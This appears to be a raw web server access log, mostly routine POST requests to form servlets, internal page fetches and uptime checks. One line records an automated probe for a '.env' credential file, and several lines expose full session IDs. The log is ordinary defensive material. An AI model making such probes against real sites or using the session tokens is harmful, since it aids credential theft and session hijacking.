201.245.192.253 - - [08/Mar/2024:03:35:54 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39632
201.245.192.253 - - [08/Mar/2024:03:34:44 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39632
201.245.192.253 - - [08/Mar/2024:03:36:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39632
201.245.192.253 - - [08/Mar/2024:03:37:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:03:37:40 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [08/Mar/2024:03:37:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [08/Mar/2024:03:39:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:03:39:02 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39737
201.245.192.253 - - [08/Mar/2024:03:39:22 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39703
201.245.192.253 - - [08/Mar/2024:03:39:29 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37148
172.22.2.4 - - [08/Mar/2024:03:37:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54300
201.245.192.253 - - [08/Mar/2024:03:39:40 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [08/Mar/2024:03:40:02 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [08/Mar/2024:03:40:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
201.245.192.253 - - [08/Mar/2024:03:40:21 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37148
201.245.192.253 - - [08/Mar/2024:03:41:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:03:41:40 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:03:43:03 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39632
201.245.192.253 - - [08/Mar/2024:03:43:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:03:41:54 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 31314
201.245.192.253 - - [08/Mar/2024:03:43:40 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
109.107.182.195 - - [08/Mar/2024:03:44:05 -0500] "GET //.env HTTP/1.1" 404 1018
201.245.192.253 - - [08/Mar/2024:03:44:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39632
172.22.2.4 - - [08/Mar/2024:03:42:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [08/Mar/2024:03:44:48 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1018
216.245.221.92 - - [08/Mar/2024:03:45:02 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [08/Mar/2024:03:44:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
201.245.192.253 - - [08/Mar/2024:03:45:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [08/Mar/2024:03:43:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 46859
172.22.2.4 - - [08/Mar/2024:03:44:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
201.245.192.253 - - [08/Mar/2024:03:45:40 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
66.249.66.21 - - [08/Mar/2024:03:47:26 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1659.pdf HTTP/1.1" 200 315905
201.245.192.253 - - [08/Mar/2024:03:47:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:03:47:40 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:03:49:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39632
201.245.192.253 - - [08/Mar/2024:03:49:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:03:49:40 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [08/Mar/2024:03:50:02 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [08/Mar/2024:03:48:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [08/Mar/2024:03:49:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59083
201.245.192.253 - - [08/Mar/2024:03:51:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:03:51:40 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:03:53:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65740d95aaed04376ba5bc6200a0659e1.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [08/Mar/2024:03:53:40 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d684947034d65b4c4e923ce056fbb2be58.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [08/Mar/2024:03:55:02 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [08/Mar/2024:03:55:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39632
